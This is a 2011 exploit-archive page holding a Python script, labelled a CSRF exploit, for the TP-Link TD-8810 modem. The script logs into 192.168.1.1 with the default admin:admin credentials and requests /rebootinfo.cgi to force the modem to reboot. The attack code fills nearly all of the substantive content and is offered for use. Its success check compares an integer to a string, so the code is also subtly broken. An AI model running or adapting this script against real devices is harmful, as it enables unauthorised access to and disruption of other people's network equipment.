what you don't know can hurt you

TPLINK TD-8810 Cross Site Request Forgery

TPLINK TD-8810 Cross Site Request Forgery
Posted Sep 2, 2011
Authored by C4SS!0 G0M3S

TPLINK TD-8810 cross site request forgery exploit that performs a reboot of the modem.

tags | exploit, csrf
MD5 | 68cd8397c279e94d4f185443f6005632

TPLINK TD-8810 Cross Site Request Forgery

Change Mirror Download
#!/usr/bin/python
#
#[+]Exploit Title: TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit
#[+]Date: 01\09\2011
#[+]Author: C4SS!0 G0M3S
#[+]Version: TD-8810
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#

from socket import *
from time import sleep
from base64 import b64encode
import os,sys

if os.name == 'nt':
os.system("color 4f")
os.system("cls")
os.system("title TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit")
else:
os.system("clear")
print '''

TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit
Created by C4SS!0 G0M3S
E-mail louredo_@hotmail.com
Blog net-fuzzer.blogspot.com

'''
request = (
"GET / HTTP/1.1\r\n"
"Host: 192.168.1.1\r\n"
"User-Agent: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.21) Gecko/20110830 Firefox/3.6.21\r\n"
"Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
"Accept-Encoding: gzip,deflate\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Connection: keep-alive\r\n"
"Authorization: Basic "+b64encode("admin:admin")+"\r\n\r\n" # Using the default password
)
request2 = (
"GET /rebootinfo.cgi HTTP/1.1\r\n"
"Host: 192.168.1.1\r\n"
"User-Agent: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.21) Gecko/20110830 Firefox/3.6.21\r\n"
"Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
"Accept-Encoding: gzip,deflate\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Connection: keep-alive\r\n"
"Authorization: Basic "+b64encode("admin:admin")+"\r\n\r\n" # Using the default password
)
print "\t\t[+]Connecting in the Modem TP-LINK TD-8810..."
sleep(1)
s = socket(AF_INET,SOCK_STREAM,0)
s.connect(('192.168.1.1',80))
print "\t\t[+]Sending HTTP Request..."
sleep(1)
s.send(request)
data = s.recv(100000)
s.close()
if (int(data.split("\r\n")[0].split(" ")[1]) == "200") == 0:
print "\t\t[+]User Logged successfully."
sleep(1)
print "\t\t[+]Sending the request to shutdown the modem..."
sleep(1)
s = socket(AF_INET,SOCK_STREAM,0)
s.connect(('192.168.1.1',80))
s.send(request2)
print "\t\t[+]Exploit Sent wait your Modem Reboot... :)"
sleep(1)
s.close()
else:
print "\t\t[+]I can't log in your modem. Maybe Password Or Username is Wrong."
sleep(1)




Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    11 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close